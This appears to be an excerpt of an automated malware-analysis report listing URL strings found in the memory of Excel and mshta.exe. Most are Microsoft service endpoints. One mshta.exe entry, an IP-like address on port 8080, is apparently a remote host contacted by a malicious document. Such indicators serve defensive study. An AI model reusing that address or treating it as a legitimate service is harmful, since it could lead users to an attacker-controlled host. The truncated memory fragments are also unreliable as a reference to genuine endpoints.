      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
      Source: EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
      Source: EXCEL.EXE, 00000000.00000003.673968944.0000000012B2E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673679757.0000000012B2E000.00000004.00000001.sdmpString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1MBI_SSL_SHORT
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmpString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1Q
      Source: EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://management.azure.com
      Source: EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://management.azure.com/
      Source: EXCEL.EXE, 00000000.00000003.673746154.0000000012BC0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.674134785.0000000012BC5000.00000004.00000001.sdmpString found in binary or memory: https://management.azure.com/BingGeospatialEndpointServiceUrlhttps://dev.virtualearth.net/REST/V1/Ge
      Source: EXCEL.EXE, 00000000.00000003.673843716.0000000012B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965595762.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673700420.0000000012B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.867887327.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770875637.0000000012B42000.00000004.00000001.sdmpString found in binary or memory: https://management.azure.com/t
      Source: EXCEL.EXE, 00000000.00000002.965595762.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.867887327.0000000012B2D000.00000004.00000001.sdmpString found in binary or memory: https://management.azure.comPlannerBaseUrlhttps://tasks.office.comPl
      Source: EXCEL.EXE, 00000000.00000003.673843716.0000000012B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965595762.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673700420.0000000012B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.867887327.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770875637.0000000012B42000.00000004.00000001.sdmpString found in binary or memory: https://management.azure.comfR
      Source: EXCEL.EXE, 00000000.00000003.770875637.0000000012B42000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://messaging.office.com/
      Source: EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://metadata.templates.cdn.office.net/client/log
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmpString found in binary or memory: https://metadata.templates.cdn.office.net/client/logH
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
      Source: EXCEL.EXE, 00000000.00000003.673746154.0000000012BC0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.674134785.0000000012BC5000.00000004.00000001.sdmpString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicyBearer
      Source: EXCEL.EXE, 00000000.00000002.965387806.00000000129FC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmpString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechB
      Source: EXCEL.EXE, 00000000.00000003.673679757.0000000012B2E000.00000004.00000001.sdmpString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechBearer
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673968944.0000000012B2E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673679757.0000000012B2E000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://ncus.contentsync.
      Source: EXCEL.EXE, 00000000.00000003.673968944.0000000012B2E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965309540.00000000129A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673679757.0000000012B2E000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://ncus.pagecontentsync.
      Source: EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.com
      Source: EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.com/nexus/rules
      Source: EXCEL.EXE, 00000000.00000003.770875637.0000000012B42000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.com/nexus/rules?Application=excel.exe&Version=16.0.4954.1000&ClientId=
      Source: EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmpString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord-
      Source: EXCEL.EXE, 00000000.00000003.673968944.0000000012B2E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673679757.0000000012B2E000.00000004.00000001.sdmpString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecordhttps://login.windows.net/co
      Source: EXCEL.EXE, 00000000.00000003.673968944.0000000012B2E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673679757.0000000012B2E000.00000004.00000001.sdmpString found in binary or memory: https://o365auditrealtimeingestion.manage.office.comBearer
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmpString found in binary or memory: https://o365auditrealtimeingestion.manage.office.comU
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
      Source: EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
      Source: EXCEL.EXE, 00000000.00000002.965595762.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.867887327.0000000012B2D000.00000004.00000001.sdmpString found in binary or memory: https://ocos-office365-s2s.msedge.net/abTasExperimentReq
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmpString found in binary or memory: https://ocos-office365-s2s.msedge.net/abce
      Source: mshta.exe, 00000006.00000003.699233022.000001BF49909000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.958349675.000001BF49909000.00000004.00000020.sdmpString found in binary or memory: https://of.230.250.107:8080/
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
      Source: EXCEL.EXE, 00000000.00000002.965387806.00000000129FC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.826754049.000000000F173000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965352435.00000000129E2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869975155.000000000F173000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678502130.000000000F183000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.674412256.000000000F1BB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829204148.000000000F173000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.826190690.000000000F173000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770810330.000000000F173000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.811332568.000000000F173000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678232726.000000000F183000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://officeapps.live.com
      Source: EXCEL.EXE, 00000000.00000002.965387806.00000000129FC000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com$
      Source: EXCEL.EXE, 00000000.00000002.965387806.00000000129FC000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com.
      Source: EXCEL.EXE, 00000000.00000002.965387806.00000000129FC000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com6
      Source: EXCEL.EXE, 00000000.00000002.965387806.00000000129FC000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com8
      Source: EXCEL.EXE, 00000000.00000002.965387806.00000000129FC000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comJ
      Source: EXCEL.EXE, 00000000.00000002.965387806.00000000129FC000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comL
      Source: EXCEL.EXE, 00000000.00000003.678232726.000000000F183000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comN
      Source: EXCEL.EXE, 00000000.00000002.965387806.00000000129FC000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comT
      Source: EXCEL.EXE, 00000000.00000002.965387806.00000000129FC000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comV
      Source: EXCEL.EXE, 00000000.00000002.965387806.00000000129FC000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comh
      Source: EXCEL.EXE, 00000000.00000002.965387806.00000000129FC000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comj
      Source: EXCEL.EXE, 00000000.00000002.965387806.00000000129FC000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comr
      Source: EXCEL.EXE, 00000000.00000002.965595762.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673690971.0000000012B46000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673980862.0000000012B46000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.867887327.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770875637.0000000012B42000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
      Source: EXCEL.EXE, 00000000.00000002.965387806.00000000129FC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
      Source: EXCEL.EXE, 00000000.00000002.965595762.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673690971.0000000012B46000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673980862.0000000012B46000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.867887327.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770875637.0000000012B42000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
      Source: EXCEL.EXE, 00000000.00000003.673843716.0000000012B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965595762.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673700420.0000000012B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.867887327.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770875637.0000000012B42000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
      Source: EXCEL.EXE, 00000000.00000003.673746154.0000000012BC0000.00000004.00000001.sdmpString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesOfficeAddInClassifierOfficeEntitiesUpdated
      Source: EXCEL.EXE, 00000000.00000002.965387806.00000000129FC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
      Source: EXCEL.EXE, 00000000.00000002.965387806.00000000129FC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
      Source: EXCEL.EXE, 00000000.00000003.673746154.0000000012BC0000.00000004.00000001.sdmpString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesOfficeAddInClassifierOfficeSharedEnt
      Source: EXCEL.EXE, 00000000.00000002.965387806.00000000129FC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
      Source: 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://onedrive.live.com
      Source: EXCEL.EXE, 00000000.00000002.965387806.00000000129FC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
      Source: EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://onedrive.live.com/embed?
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmpString found in binary or memory: https://onedrive.live.com/embed?ites
      Source: EXCEL.EXE, 00000000.00000003.673657155.0000000012AEF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673947140.0000000012AF1000.00000004.00000001.sdmpString found in binary or memory: https://onedrive.live.comOneDriveLogUploadServicehttps://storage.live.com/clientlogs/uploadlocationM
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://osi.office.net
      Source: EXCEL.EXE, 00000000.00000003.673843716.0000000012B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965595762.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673700420.0000000012B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.867887327.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770875637.0000000012B42000.00000004.00000001.sdmpString found in binary or memory: https://osi.office.netst
      Source: EXCEL.EXE, 00000000.00000003.673843716.0000000012B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965595762.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673700420.0000000012B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.867887327.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770875637.0000000012B42000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://otelrules.azureedge.net
      Source: EXCEL.EXE, 00000000.00000003.673843716.0000000012B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965595762.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673700420.0000000012B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.867887327.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770875637.0000000012B42000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://outlook.office.com
      Source: EXCEL.EXE, 00000000.00000002.965387806.00000000129FC000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office.com$
      Source: EXCEL.EXE, 00000000.00000003.674210580.000000000F038000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965069920.000000000F178000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.674386257.000000000F183000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.826754049.000000000F173000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869975155.000000000F173000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678502130.000000000F183000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829204148.000000000F173000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.826190690.000000000F173000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770810330.000000000F173000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.811332568.000000000F173000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678232726.000000000F183000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://outlook.office.com/
      Source: EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965309540.00000000129A0000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
      Source: EXCEL.EXE, 00000000.00000003.673843716.0000000012B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965595762.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673700420.0000000012B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.867887327.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770875637.0000000012B42000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office.comUP
      Source: EXCEL.EXE, 00000000.00000002.965387806.00000000129FC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://outlook.office365.com
      Source: EXCEL.EXE, 00000000.00000003.674210580.000000000F038000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965069920.000000000F178000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.674386257.000000000F183000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.826754049.000000000F173000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869975155.000000000F173000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678502130.000000000F183000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829204148.000000000F173000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.826190690.000000000F173000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770810330.000000000F173000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.811332568.000000000F173000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678232726.000000000F183000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://outlook.office365.com/
      Source: EXCEL.EXE, 00000000.00000002.965387806.00000000129FC000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office365.com/B
      Source: EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities&
      Source: EXCEL.EXE, 00000000.00000003.673746154.0000000012BC0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.674134785.0000000012BC5000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office365.com/api/v1.0/me/ActivitiesMBI_SSL
